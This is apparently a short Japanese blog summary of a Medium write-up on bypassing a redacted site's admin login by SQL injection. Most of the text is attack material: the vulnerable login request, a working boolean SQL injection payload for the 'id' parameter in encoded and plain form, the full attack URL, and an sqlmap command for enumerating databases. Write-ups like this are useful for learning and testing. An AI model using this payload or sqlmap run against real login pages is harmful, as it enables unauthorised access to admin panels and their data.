Blog Post: Bypassing an Admin Panel with SQL Injection から学ぶ

ソース:

medium.com

脆弱性SQLインジェクション

 

訳:

脆弱なログインページの特定

 

GET /redacted/redacted_admin.xml?id=admin&pswd=admin&uniqueId=0.5331820440279285 HTTP/1.1 2

基本を試した後、 admin:admin運が悪かったので、ページ上の JS を読んで、SQL インジェクションを試してみることにしました。 さまざまなペイロードをテストした結果、実際に機能するペイロードにたどり着きました。 idペイロードを使用するパラメータ: 

 

-6513%27%20OR%20%28SELECT%20INSTR2%28NULL%2CNULL%29%20FROM%20DUAL%29%20IS%20NULL--%20SpSw

-6513' OR (SELECT INSTR2(NULL,NULL) FROM DUAL) IS NULL-- SpSw

 

リクエストの全体は以下の通り。

 

https://redacted.com/redacted/redacted_admin.xml?id=-6513%27%20OR%20%28SELECT%20INSTR2%28NULL%2CNULL%29%20FROM%20DUAL%29%20IS%20NULL--%20SpSw&pswd=admin&uniqueId=0.5331820440279285

 

 

https://redacted.com/redacted/redacted_admin.xml?id=-6513' OR (SELECT INSTR2(NULL,NULL) FROM DUAL) IS NULL-- SpSw&pswd=admin&uniqueId=0.5331820440279285

 

 

 

sqlmap を使用した追加の悪用

 

sqlmap -r request.txt --random-agent --dbs --proxy=http://127.0.0.1:8080 --force-ssl --batch --risk 3 --level 3

 

 

 

ほなほな。